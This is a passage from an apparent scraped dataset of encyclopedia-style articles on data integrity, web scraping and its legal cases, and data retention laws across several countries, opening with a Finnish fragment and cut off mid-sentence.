Osapuolet, joiden tietoja pyrit n haravoimaan, voivat pyrki est m n t m n esimerkiksi verkkosivun k ytt ehdoilla. Verkkosivun koodi voidaan my s obfuskoida lukemiskelvottomaksi. CAPTCHA-kyselyt voivat tehokkaasti est automaattisen tietojen haravoinnin. Tiedonharavoinnin vastakohtana voidaan pit APIen k ytt . Useat suuret verkkosivustot kuten Google, Facebook tai StackOverflow tarjoavat valmiin rajapinnan, jolla sivuston data voi k ytt strukturoidussa muodossa. |
616 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_integrity | Data integrity is the maintenance of, and the assurance of, data accuracy and consistency over its entire life-cycle. 1 It is a critical aspect to the design, implementation, and usage of any system that stores, processes, or retrieves data. The term is broad in scope and may have widely different meanings depending on the specific context even under the same general umbrella of computing. It is at times used as a proxy term for data quality, 2 while data validation is a prerequisite for data integrity. 3 Data integrity is the opposite of data corruption. 4 The overall intent of any data integrity technique is the same: ensure data is recorded exactly as intended (such as a database correctly rejecting mutually exclusive possibilities). Moreover, upon later retrieval, ensure the data is the same as when it was originally recorded. In short, data integrity aims to prevent unintentional changes to information. Data integrity is not to be confused with data security, the discipline of protecting data from unauthorized parties. Any unintended changes to data as the result of a storage, retrieval or processing operation, including malicious intent, unexpected hardware failure, and human error, is failure of data integrity. If the changes are the result of unauthorized access, it may also be a failure of data security. Depending on the data involved this could manifest itself as benign as a single pixel in an image appearing a different color than was originally recorded, to the loss of vacation pictures or a business-critical database, to even catastrophic loss of human life in a life-critical system. Physical integrity deals with challenges which are associated with correctly storing and fetching the data itself. Challenges with physical integrity may include electromechanical faults, design flaws, material fatigue, corrosion, power outages, natural disasters, and other special environmental hazards such as ionizing radiation, extreme temperatures, pressures and g-forces. Ensuring physical integrity includes methods such as redundant hardware, an uninterruptible power supply, certain types of RAID arrays, radiation hardened chips, error-correcting memory, use of a clustered file system, using file systems that employ block level checksums such as ZFS, storage arrays that compute parity calculations such as exclusive or or use a cryptographic hash function and even having a watchdog timer on critical subsystems. Physical integrity often makes extensive use of error detecting algorithms known as error-correcting codes. Human-induced data integrity errors are often detected through the use of simpler checks and algorithms, such as the Damm algorithm or Luhn algorithm. These are used to maintain data integrity after manual transcription from one computer system to another by a human intermediary (e.g. credit card or bank routing numbers). Computer-induced transcription errors can be detected through hash functions. In production systems, these techniques are used together to ensure various degrees of data integrity. For example, a computer file system may be configured on a fault-tolerant RAID array, but might not provide block-level checksums to detect and prevent silent data corruption. As another example, a database management system might be compliant with the ACID properties, but the RAID controller or hard disk drive's internal write cache might not be. This type of integrity is concerned with the correctness or rationality of a piece of data, given a particular context. This includes topics such as referential integrity and entity integrity in a relational database or correctly ignoring impossible sensor data in robotic systems. These concerns involve ensuring that the data "makes sense" given its environment. Challenges include software bugs, design flaws, and human errors. Common methods of ensuring logical integrity include things such as check constraints, foreign key constraints, program assertions, and other run-time sanity checks. Physical and logical integrity often share many challenges such as human errors and design flaws, and both must appropriately deal with concurrent requests to record and retrieve data, the latter of which is entirely a subject on its own. If a data sector only has a logical error, it can be reused by overwriting it with new data. In case of a physical error, the affected data sector is permanently unusable. Data integrity contains guidelines for data retention, specifying or guaranteeing the length of time data can be retained in a particular database (typically a relational database). To achieve data integrity, these rules are consistently and routinely applied to all data entering the system, and any relaxation of enforcement could cause errors in the data. Implementing checks on the data as close as possible to the source of input (such as human data entry), causes less erroneous data to enter the system. Strict enforcement of data integrity rules results in lower error rates, and time saved troubleshooting and tracing erroneous data and the errors it causes to algorithms. Data integrity also includes rules defining the relations a piece of data can have to other pieces of data, such as a Customer record being allowed to link to purchased Products, but not to unrelated data such as Corporate Assets. Data integrity often includes checks and correction for invalid data, based on a fixed schema or a predefined set of rules. An example being textual data entered where a date-time value is required. Rules for data derivation are also applicable, specifying how a data value is derived based on algorithm, contributors and conditions. It also specifies the conditions on how the data value could be re-derived. Data integrity is normally enforced in a database system by a series of integrity constraints or rules. Three types of integrity constraints are an inherent part of the relational data model: entity integrity, referential integrity and domain integrity. If a database supports these features, it is the responsibility of the database to ensure data integrity as well as the consistency model for the data storage and retrieval. If a database does not support these features, it is the responsibility of the applications to ensure data integrity while the database supports the consistency model for the data storage and retrieval. Having a single, well-controlled, and well-defined data-integrity system increases: Modern databases support these features (see Comparison of relational database management systems), and it has become the de facto responsibility of the database to ensure data integrity. Companies, and indeed many database systems, offer products and services to migrate legacy systems to modern databases. An example of a data-integrity mechanism is the parent-and-child relationship of related records. If a parent record owns one or more related child records all of the referential integrity processes are handled by the database itself, which automatically ensures the accuracy and integrity of the data so that no child record can exist without a parent (also called being orphaned) and that no parent loses their child records. It also ensures that no parent record can be deleted while the parent record owns any child records. All of this is handled at the database level and does not require coding integrity checks into each application. Various research results show that neither widespread filesystems (including UFS, Ext, XFS, JFS and NTFS) nor hardware RAID solutions provide sufficient protection against data integrity problems. 5 6 7 8 9 Some filesystems (including Btrfs and ZFS) provide internal data and metadata checksumming that is used for detecting silent data corruption and improving data integrity. If a corruption is detected that way and internal RAID mechanisms provided by those filesystems are also used, such filesystems can additionally reconstruct corrupted data in a transparent way. 10 This approach allows improved data integrity protection covering the entire data paths, which is usually known as end-to-end data protection. 11 |
617 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-4 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
618 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_retention | Data retention defines the policies of persistent data and records management for meeting legal and business data archival requirements. Although sometimes interchangeable, it is not to be confused with the Data Protection Act 1998. The different data retention policies weigh legal and privacy concerns economics and need-to-know concerns to determine the retention time, archival rules, data formats, and the permissible means of storage, access, and encryption. 1 In the field of telecommunications, "data retention" generally refers to the storage of call detail records (CDRs) of telephony and internet traffic and transaction data (IPDRs) by governments and commercial organisations. 2 In the case of government data retention, the data that is stored is usually of telephone calls made and received, emails sent and received, and websites visited. Location data is also collected. The primary objective in government data retention is traffic analysis and mass surveillance. By analysing the retained data, governments can identify the locations of individuals, an individual's associates and the members of a group such as political opponents. These activities may or may not be lawful, depending on the constitutions and laws of each country. In many jurisdictions, access to these databases may be made by a government with little or no judicial oversight. citation needed 3 4 In the case of commercial data retention, the data retained will usually be on transactions and web sites visited. Data retention also covers data collected by other means (e.g., by Automatic number-plate recognition systems) and held by government and commercial organisations. A data retention policy is a recognized and proven protocol within an organization for retaining information for operational use while ensuring adherence to the laws and regulations concerning them. The objectives of a data retention policy are to keep important information for future use or reference, to organize information so it can be searched and accessed at a later date and to dispose of information that is no longer needed. 5 The data retention policies within an organization are a set of guidelines that describes which data will be archived, how long it will be kept, what happens to the data at the end of the retention period (archive or destroy) and other factors concerning the retention of the data. 6 A part of any effective data retention policy is the permanent deletion of the retained data; achieving secure deletion of data by encrypting the data when stored, and then deleting the encryption key after a specified retention period. Thus, effectively deleting the data object and its copies stored in online and offline locations. 7 In 2015, the Australian government introduced mandatory data retention laws that allows data to be retained up to two years. 8 The scheme is estimated to cost at least AU$400 million per year to implement, working out to at least $16 per user per year. 9 It requires telecommunication providers and ISPs to retain telephony, Internet and email metadata for two years, accessible without a warrant, and could possibly be used to target file sharing. 10 11 The Attorney-General has broad discretion on which agencies are allowed to access metadata, including private agencies. 12 The Greens were strongly opposed to the introduction of these laws, citing privacy concerns and the increased prospect of 'speculative invoicing' over alleged copyright infringement cases. 13 14 The Labor Party initially opposed as well, but later agreed to passing the law after additional safeguards were put in place to afford journalists some protection. 15 16 On 15 March 2006, the European Union adopted the Data Retention Directive. 17 18 It required Member States to ensure that communications providers retain data as specified in the Directive for a period of between 6 months and 2 years in order to: The data was required to be available to "competent" national authorities "for the purpose of the investigation, detection and prosecution of serious crime, as defined by each Member State in its national law". The Directive covered fixed telephony, mobile telephony, Internet access, email, and VoIP. Member States were required to transpose it into national law within 18 months—no later than September 2007. However, they could if they wished postpone the application of the Directive to Internet access, email, and VoIP for a further 18 months after this date. A majority of Member States exercised this option. All 28 EU States at the time notified the European Commission about the transposition of the Directive into their national law. Of these, however, Germany and Belgium had only transposed the legislation partially. 19 A report evaluating the Directive was published by the European Commission in April 2011. 20 It concluded that data retention was a valuable tool for ensuring criminal justice and public protection, but that it had achieved only limited harmonisation. There were serious concerns from service providers about the compliance costs and from civil society organisations who claimed that mandatory data retention was an unacceptable infringement of the fundamental right to privacy and the protection of personal data according to EU law. In response to the report, on May 31, 2011, the European Data Protection Supervisor expressed some concerns on the European Data Retention Directive, underlining that the Directive "does not meet the requirements imposed by the fundamental rights to privacy and data protection". 21 In November 2012, answers to a parliamentary inquiry in the German Bundestag revealed plans of some EU countries including France to extend data retention to chats and social media. Furthermore, the German Federal Office for the Protection of the Constitution (Germany's domestic intelligence agency) has confirmed that it has been working with the ETSI LI Technical Committee since 2003. 22 23 24 25 26 Criticisms of the directive arose. The council's Legal Services was reported to have stated in closed session that paragraph 59 of the European Court of Justice's ruling "suggests that general and blanket data retention is no longer possible". 27 A legal opinion funded by the Greens EFA Group in the European Parliament finds that the blanket retention data of unsuspected persons generally violates the EU Charter of Fundamental Rights, both in regard to national telecommunications data retention laws and to similar EU data retention schemes (PNR, TFTP, TFTS, LEA access to EES, Eurodac, VIS). 28 Digital Rights Ireland brought the directive to the High Court of Ireland, which then brought it further to the European Court of Justice of the European Union. The case was also joined by the Constitutional Court of Austria. The Court on 8 April 2014 declared the Directive 2006 24 EC invalid for violating fundamental rights, stating that "the directive interferes in a particularly serious manner with the fundamental rights to respect for private life and to the protection of personal data". 29 30 This led further to that the member states in various degrees abolished or modified their implementations of the directive. Since the Swedish implementation of the directive was kept in a similar manner, the Swedish implementation was brought to the European Court by the telecom provider Tele2, and the case was merged with a similar case from the United Kingdom, initiated by three persons with intervention by Open Rights Group, Privacy International and The Law Society of England and Wales. Since the original directive no longer existed, the basis for the judgment was an exception to the Directive on privacy and electronic communications 31 in its Article 15(1), referring to the possibility to exceptionally apply data retention for fighting serious crime. On the 21 of December 2016 the Court ruled that "the protection of privacy in the electronic communications sector must be interpreted as precluding national legislation which, for the purpose of fighting crime, provides for general and indiscriminate retention of all traffic and location data of all subscribers and registered users relating to all means of electronic communication. 32 Blanket data retention was ruled out another time, but the actual consequences all over the EU are varied and under discussion since then. Implementation of the directive was part of Act. No. 259 2010 Coll. on electronic communications as later amended. Under Art. 97 (3), telecommunication data are to be stored between 6 and 12 months. The Czech Constitutional Court has deemed the law unconstitutional and found it to be infringing on the peoples right to privacy. 33 As of July 2012, new legislation was on its way. 34 Denmark has implemented the EU data retention directive and much more, by logging all internet flow or sessions between operators and operators and consumers. 35 The German Bundestag had implemented the directive in "Gesetz zur Neuregelung der Telekommunikations berwachung und anderer verdeckter Ermittlungsma nahmen sowie zur Umsetzung der Richtlinie 2006 24 EG". 36 The law became valid on 1 January 2008. Any communications data had to be retained for six months. On 2 March 2010, the Federal Constitutional Court of Germany ruled the law unconstitutional as a violation of the guarantee of the secrecy of correspondence. 37 On 16 October 2015, a second law for shorter, up to 10 weeks long, data retention excluding email communication was passed by parliament. 38 39 40 However, this act was ruled incompatible with German and European laws by an injunction of the Higher Administrative Court of North Rhine-Westphalia. As a result, on June 28, 2017, three days before the planned start of data retention, the Federal Network Agency suspended the introduction of data retention until a final decision in the principle proceedings. 41 In July 2005 new legal requirements 42 on data retention came into force in Italy. Italy already required the retention of telephony traffic data for 48 months, but without location data. Italy has adopted the EU Directive on Privacy and Electronic Communications 2002 but with an exemption to the requirement to erase traffic data. The directive was transposed into law by Law 32 2008. 43 In December 2017, D3 Defesa dos Direitos Digitais, a Portuguese digital rights organization, presented a complaint to the Justice Ombudsman, based on the case law of the Court of Justice of the European Union, 44 45 following several opinions of the Portuguese Data Protection Authority. In January 2019, the Ombudsman issued an official recommendation to the Justice Ministry, 46 defending the need to change the national law, in order to comply with the CJEU case law. Some weeks later, in March, the Ombudsman received an answer by the Minister of Justice, where the Minister refused changes to the law. 47 As such, in August 2019, the Ombudsman decided to ask the Portuguese Constitutional Court for a ruling on the constitutionality of the law. 48 In 2022, the Portuguese Constitutional Court published its decision, 49 striking down Law 32 2008 as unconstitutional. Among other things, the Court considered that an undifferentiated and generalized obligation to store all traffic and location data relating to all people did not respect the proportionality principle. 50 In response to this decision, the parliament created a data retention working party, which studied the subject for more than a year and held several hearings with experts. In 2023, a law proposal was approved in the parliament. 51 However, the President of the Republic decided to make use of its prerogative of asking the Constitutional Court for a preventive rule, before approving the law. In this ruling, the Constitutional Court once again decided against the proposed data retention regime, 52 for similar reasons, as the law still required indiscriminate and general data retention of traffic and location data. The diploma was returned to the Parliament and did not become law. In 2024, the Parliament approved a new law proposal. 53 This time, the President of the Republic opted for not requesting a preventive rule from the Constitutional Court, and so the law was published and entered into force. 54 The digital rights association D3 Defesa dos Direitos Digitais maintains that the current law is still a violation of fundamental rights, as it delegates core elements of a fundamental rights restriction to a special formation of the Supreme Court. This makes it impossible to demonstrate the required proportionality of the restriction, or to demonstrate how the data retention regime preserves the essential core of the restricted fundamental rights, as it must. 55 The EU directive has been transposed into Romanian law as well, initially as Law 298 2008. 56 However, the Constitutional Court of Romania subsequently struck down the law in 2009 as violating constitutional rights. 57 The court held that the transposing act violated the constitutional rights of privacy, of confidentiality in communications, and of free speech. 58 The European Commission has subsequently sued Romania in 2011 for non-implementation, threatening Romania with a fine of 30,000 euros per day. 59 The Romanian parliament passed a new law in 2012, which was signed by president Traian B sescu in June. 60 The Law 82 2012 has been nicknamed "Big Brother" (using the untranslated English expression) by various Romanian non-governmental organizations opposing it. 59 61 62 On July 8, 2014, this law too was declared unconstitutional by the Constitutional Court of Romania. 63 Slovakia has implemented the directive in Act No. 610 2003 Coll. on electronic communications as later amended. Telecommunication data are stored for six months in the case of data related to Internet, Internet email and Internet telephony (art. 59a (6) a), and for 12 months in the case of other types of communication (art. 59a (6) b). In April 2014, the Slovak Constitutional Court preliminary suspended effectiveness of the Slovak implementation of Data Retention Directive and accepted the case for the further review. 64 65 In April 2015 Constitutional court decided that some parts of Slovak laws implementing DR Directive are not in compliance with Slovak constitution and Convention for the Protection of Human Rights and Fundamental Freedoms. 66 According to now invalid provisions of the Electronic Communications Act, the providers of electronic communications were obliged to store traffic data, localization data and data about the communicating parties for a period of 6 months (in the case Internet, email or VoIP communication) or for a period of 12 months (in case of other communication). 67 Sweden implemented the EU's 2006 Data Retention Directive in May 2012, and it was fined 3 million by the Court of Justice of the European Union for its belated transposition (the deadline was 15 September 2007). 68 69 70 71 The directive allowed member states to determine the duration data is retained, ranging from six months to two years; the Riksdag, Sweden's legislature, opted for six months. 72 In April 2014, however, the CJEU struck down the Data Retention Directive. Following the judgement, PTS, Sweden's telecommunications regulator, told Swedish ISPs and telcos that they would no longer have to retain call records and internet metadata. 73 The Swedish government initiated a one-man investigation that stated that Sweden could keep on with data-retention. After that, the PTS reversed course. 74 Most of Sweden's major telecommunications companies complied immediately, though Tele2 appealed this order before the Administrative Court in Stockholm claiming that the Swedish implementation should be reversed following the directive being declared unvalid, including the fact that the Swedish implementation went further than the directive, including registration of failed telephone calls and the geographic endpoint of a mobile communications. The appeal was rejected. The one holdout ISP, Bahnhof, was given an order to comply by November 24 deadline or face a five million krona ($680,000) fine. 75 Tele2 appealed the first level court rejection to the Swedish Administrative Court of Appeal, that sent the matter to the European Court of Justice of the European Union. That led to a judgement that once again invalidated blanket data retention of all communications of all citizens' communications to combat crime. See under European Union above. The Data Retention and Investigatory Powers Act came into force in 2014. It is the answer by the United Kingdom parliament after a declaration of invalidity was made by the Court of Justice of the European Union in relation to Directive 2006 24 EC in order to make provision, about the retention of certain communications data. 76 In addition, the purpose of the act is to: The act is also to ensure that communication companies in the UK retain communications data so that it continues to be available when it is needed by law enforcement agencies and others to investigate committed crimes and protect the public. 77 Data protection law requires data that isn't of use to be deleted. This means that the intention of this Act could be using data retention to acquire further policing powers using, as the Act make data retention mandatory. An element of this Act is the provision of the investigatory powers to be reported by 1 May 2015. 78 The Data Retention and Investigatory Powers Act 2014 was referred to as the "snooper's charter" communications data bill. 79 Theresa May, a strong supporter of the Parliament Act, said in a speech that "If we (parliament) do not act, we risk sleepwalking into a society in which crime can no longer be investigated and terrorists can plot their murderous schemes undisrupted. 79 The United Kingdom parliament its new laws increasing the power of data retention is essential to tackling crime and protecting the public. However, not all agree and believe that the primary objective in the data retention by the government is mass surveillance. After Europe's highest court said the depth of data retention breaches citizens' fundamental right to privacy and the UK created its own Act, it has led to the British government being accused of breaking the law by forcing telecoms and internet providers to retain records of phone calls, texts and internet usage. 80 From this information, governments can identify an individual's associates, location, group memberships, political affiliations and other personal information. In a television interview, the EU Advocate General Pedro Cruz Villal n highlighted the risk that the retained data might be used illegally in ways that are "potentially detrimental to privacy or, more broadly, fraudulent or even malicious". 80 The bodies that are able to access retained data in the United Kingdom are listed in the Regulation of Investigatory Powers Act 2000 (RIPA). These are the following: However, the Regulation of Investigatory Powers Act 2000 (RIPA) also gives the Home Secretary powers to change the list of bodies with access to retained data through secondary legislation. The list of authorised bodies now includes: 84 The justifications for accessing retained data in the UK are set out in the Regulation of Investigatory Powers Act 2000 (RIPA). They include: The EU's Data Retention Directive has been implemented into Norwegian law in 2011, 85 but this will not be in effect before 1 January 2015. 86 A 2016 anti-terrorist federal law 374 FZ known as Yarovaya Law requires all telecommunication providers to store phone call, text and email metadata, as well as the actual voice recordings for up to 6 months. Messaging services like WhatsApp are required to provide cryptographic backdoors to law-enforcement. 87 The law has been widely criticized both in Russia and abroad as an infringement of human rights and a waste of resources. 88 89 90 91 On 29 June 2010, the Serbian parliament adopted the Law on Electronic Communications, according to which the operator must keep the data on electronic communications for 12 months. This provision was criticized as unconstitutional by opposition parties and by Ombudsman Sa a Jankovi . 92 As from 7 July 2016, the Swiss Federal Law about the Surveillance of the Post and Telecommunications entered into force, passed by the Swiss government on 18 March 2016. 93 Swiss mobile phone operators have to retain the following data for six months according to the B PF: All Internet service providers must retain the following data for six months: Email application refers to SMTP , POP3 , IMAP4, webmail- and remail-server. 94 Switzerland only applies data retention to the largest Internet service providers with over 100 million CHF in annual Swiss-sourced revenue. This notably exempts derived communications providers such as ProtonMail, a popular encrypted email service based in Switzerland. 95 The National Security Agency (NSA) commonly records Internet metadata for the whole planet for up to a year in its MARINA database, where it is used for pattern-of-life analysis. U.S. persons are not exempt because metadata are not considered data under US law (section 702 of the FISA Amendments Act). 96 Its equivalent for phone records is MAINWAY. 97 The NSA records SMS and similar text messages worldwide through DISHFIRE. 98 Various United States agencies leverage the (voluntary) data retention practised by many U.S. commercial organizations through programs such as PRISM and MUSCULAR. Amazon is known to retain extensive data on customer transactions. Google is also known to retain data on searches, and other transactions. If a company is based in the United States the Federal Bureau of 